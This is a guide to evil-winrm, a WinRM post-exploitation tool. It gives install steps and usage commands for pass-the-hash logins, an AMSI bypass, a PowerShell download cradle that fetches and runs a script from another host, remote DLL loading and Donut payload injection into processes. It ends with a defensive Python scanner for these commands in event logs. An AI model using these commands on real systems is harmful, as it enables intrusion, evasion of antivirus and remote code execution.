WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in its operating systems to make life easier for system administrators.

This program can be used against any Microsoft Windows server with this feature enabled (usually on port 5985), provided you have credentials and permissions to use it. It therefore fits the post-exploitation phase of a hacking/pentesting engagement. Its purpose is to provide nice, easy-to-use features for hacking. System administrators can also use it for legitimate purposes, but most of its features are focused on hacking/pentesting.

It is based mainly on the WinRM Ruby library, which changed the way it works as of version 2.0. Instead of using the WinRM protocol, it now uses PSRP (PowerShell Remoting Protocol) to initialize runspace pools and to create and process pipelines.

WinRM typically uses port 5985 for HTTP and port 5986 for HTTPS communication. However, the tool allows you to specify the desired port during usage, offering flexibility based on network configurations and security considerations.

  • 5985
  • 5986

Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it’s utilising WMI, so you can think of it as an HTTP based API for WMI.

https://github.com/Hackplayers/evil-winrm

Features

  • Compatible with Linux and Windows client systems
  • Load PowerShell scripts in memory
  • Load DLL files in memory, bypassing some AVs
  • Load C# (C Sharp) assemblies in memory, bypassing some AVs
  • Load x64 payloads generated with the donut technique
  • Dynamic AMSI Bypass to avoid AV signatures
  • Pass-the-hash support
  • Kerberos auth support
  • SSL and certificates support
  • Upload and download files showing progress bar
  • List remote machine services without privileges
  • Command History
  • WinRM command completion
  • Local files/directories completion
  • Remote path (files/directories) completion (can be disabled optionally)
  • Colorization on prompt and output messages (can be disabled optionally)
  • Optional logging feature
  • Docker support (prebuilt images available at Dockerhub)
  • Trap capturing to avoid accidental shell exit on Ctrl+C

Requirements

Ruby 2.3 or higher is needed. Some Ruby gems are needed as well: winrm >= 2.3.2, winrm-fs >= 1.3.2, stringio >= 0.0.2, logger >= 1.4.3, fileutils >= 0.7.2. Depending on your installation method (4 are available), you may have to install them manually.

Another important requirement, used only for Kerberos auth, is the Kerberos package used for network authentication. On Debian-based Linux distributions (Kali, Parrot, etc.) it is called krb5-user. On BlackArch it is called krb5, and it may have a different name on other Linux distributions.

Installation & Quick Start (4 methods)

Method 1. Installation directly as ruby gem (dependencies will be installed automatically on your system)

Step 1. Install it (it will install automatically dependencies):

  • gem install evil-winrm

Step 2. Ready. Just launch it!

  • evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Method 2. Git clone and install dependencies on your system manually

Step 1. Install dependencies manually:

  • sudo gem install winrm winrm-fs stringio logger fileutils

Step 2. Clone the repo:

  • git clone https://github.com/Hackplayers/evil-winrm.git

Step 3. Ready. Just launch it!

  • cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Method 3. Using bundler (dependencies will not be installed on your system, just to use evil-winrm)

Step 1. Install bundler:

  • gem install bundler

Step 2. Clone the repo:

  • git clone https://github.com/Hackplayers/evil-winrm.git

Step 3. Install dependencies with bundler:

  • cd evil-winrm && bundle install --path vendor/bundle

Step 4. Launch it with bundler:

  • bundle exec evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Method 4. Using Docker

Step 1. Launch docker container based on already built image:

  • docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/ps1_scripts/' -e '/exe_files/'

How to use

1. Display help menu

  • evil-winrm --help

Note: Notice the tool version at the top.

2. Log in with an account's username and password

  • evil-winrm -u admin1 -p Admin.123 -i 192.168.0.110

3. Connect using pass the hash

  • evil-winrm --ip [ip] --user [user] --hash [nt_hash]

4. Display the console menu, and bypass AMSI

Windows AMSI (Antimalware Scan Interface): A Microsoft security feature that allows applications and scripts to be scanned for malicious content in real-time by interfacing with antivirus and antimalware products.

  • menu
  • Bypass-4MSI

5. Connect to a host, specifying directories for scripts and executables

  • evil-winrm --ip [ip] --user [user] --password [password] --scripts [path/to/scripts] --executables [path/to/executables]

SSL

1. Connect to a host, using SSL

  • evil-winrm --ip [ip] --user [user] --password [password] --ssl --pub-key [path/to/pubkey] --priv-key [path/to/privkey]

Upload Download files

1. Upload files

  • upload [path/to/local/file] [path/to/remote/file]
  • upload /home/kali/secret.txt C:\Users\admin1\Documents\secret.txt

2. Download files

  • download [path/to/remote/file] [path/to/local/file]
  • download C:\Users\admin1\Documents\Server_Secret.txt /home/kali/Server_Secret.txt

Import Powershell scripts

1. To load a PowerShell script, download the script onto the remote computer, then display the menu to see all the imported methods/modules

  • IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.10:9999/PowerView.ps1')
  • menu

2. Run the modules

  • Get-Domain

3. (OPTIONAL) We can also log in specifying a local scripts folder, so you only need to call the script by name, without downloading it from the local machine

  • evil-winrm -u admin1 -p Admin.123 -i 192.168.0.110 -s ~/Documents/Tools/PowerSploit/Recon
  • PowerView.ps1

Import DLL

1. Import DLL

  • Dll-Loader
  • Dll-Loader -smb -path \\192.168.139.132\\share\\myDll.dll
  • Dll-Loader -local -path C:\Users\Pepito\Desktop\myDll.dll
  • Dll-Loader -http -path http://example.com/myDll.dll

Note: To call the methods of a loaded DLL

  • [SharpSploit.Enumeration.Net]::GetNetLocalGroupMembers()

Import Binary

1. Invoke a binary on the host from the --executables directory

  • Invoke-Binary
  • Invoke-Binary /opt/csharp/Watson.exe
  • Invoke-Binary /opt/csharp/Binary.exe param1,param2,param3
  • Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'

Import Donut payloads

1. Donut-Loader: allows injecting x64 payloads generated with the donut technique. There is no need to encode the payload.bin; just generate and inject (https://github.com/TheWover/donut)

  • Donut-Loader
  • Donut-Loader -process_id 2195 -donutfile /home/cybervaca/donut.bin
  • Donut-Loader -process_id (get-process notepad).id -donutfile /home/cybervaca/donut.bin
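From the defender's side, the command names listed in the sections above (Bypass-4MSI, Dll-Loader, Invoke-Binary, Donut-Loader) and the IEX download cradle are strings that can be hunted for in PowerShell script block logging (event ID 4104). The following is an added example, not code from the original page or from the evil-winrm project; it assumes the events were exported as one JSON object per line, and the field names, the sample events and the `download-cradle` label are constructed for illustration.

```python
import json
import re

# Function names exactly as they appear in this page's command listings.
LOADER_NAMES = ("Bypass-4MSI", "Dll-Loader", "Invoke-Binary", "Donut-Loader")
CANON = {n.lower(): n for n in LOADER_NAMES}
NAME_RE = re.compile(
    r"(?<![\w-])(" + "|".join(map(re.escape, LOADER_NAMES)) + r")(?![\w-])", re.I)
# Download cradle in the form shown under "Import Powershell scripts".
CRADLE_RE = re.compile(
    r"IEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*\.\s*DownloadString", re.I)

# Constructed sample export, one JSON object per line. The field names are an
# assumption about how the 4104 events were exported, not a fixed Windows schema.
SAMPLE_EVENTS = r"""
{"EventID": 4104, "Computer": "SRV01", "User": "CORP\\admin1", "ScriptBlockText": "Get-Service | Sort-Object Status"}
{"EventID": 4104, "Computer": "SRV01", "User": "CORP\\admin1", "ScriptBlockText": "Bypass-4MSI"}
{"EventID": 4104, "Computer": "SRV01", "User": "CORP\\admin1", "ScriptBlockText": "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.10:9999/PowerView.ps1')"}
{"EventID": 4104, "Computer": "SRV02", "User": "CORP\\admin1", "ScriptBlockText": "donut-loader -process_id 2195 -donutfile /home/cybervaca/donut.bin"}
{"EventID": 4104, "Computer": "SRV02", "User": "CORP\\svc_app", "ScriptBlockText": "$f = New-Object Invoke-BinaryFormatter"}
{"EventID": 4624, "Computer": "SRV02", "User": "CORP\\admin1", "ScriptBlockText": "Dll-Loader"}
{"EventID": 4104, "Computer": "SRV02", "Script
"""


def scan(lines):
    """Return (computer, user, indicators) for each matching 4104 event."""
    hits = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # blank, truncated or malformed export line
        if not isinstance(ev, dict) or ev.get("EventID") != 4104:
            continue  # only script block logging events are inspected
        text = ev.get("ScriptBlockText") or ""
        indicators = sorted({CANON[m.group(1).lower()] for m in NAME_RE.finditer(text)})
        if CRADLE_RE.search(text):
            indicators.append("download-cradle")
        if indicators:
            hits.append((ev.get("Computer"), ev.get("User"), indicators))
    return hits


if __name__ == "__main__":
    for computer, user, indicators in scan(SAMPLE_EVENTS.splitlines()):
        print(f"{computer} {user}: {', '.join(indicators)}")
```

Function names can be renamed by whoever runs the tool, so treat a hit as one signal to correlate with WinRM logons on ports 5985/5986 rather than as complete coverage.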

Sources

https://linuxcommandlibrary.com/man/evil-winrm

https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm

https://www.hackplayers.com/2019/10/evil-winrm-shell-winrm-para-pentesting.html

https://thehackerway.com/2021/12/15/evil-winrm-shell-sobre-winrm-para-pentesting-en-sistemas-windows-parte-2-de-2/

https://github.com/Hackplayers/evil-winrm

https://github.com/TheWover/donut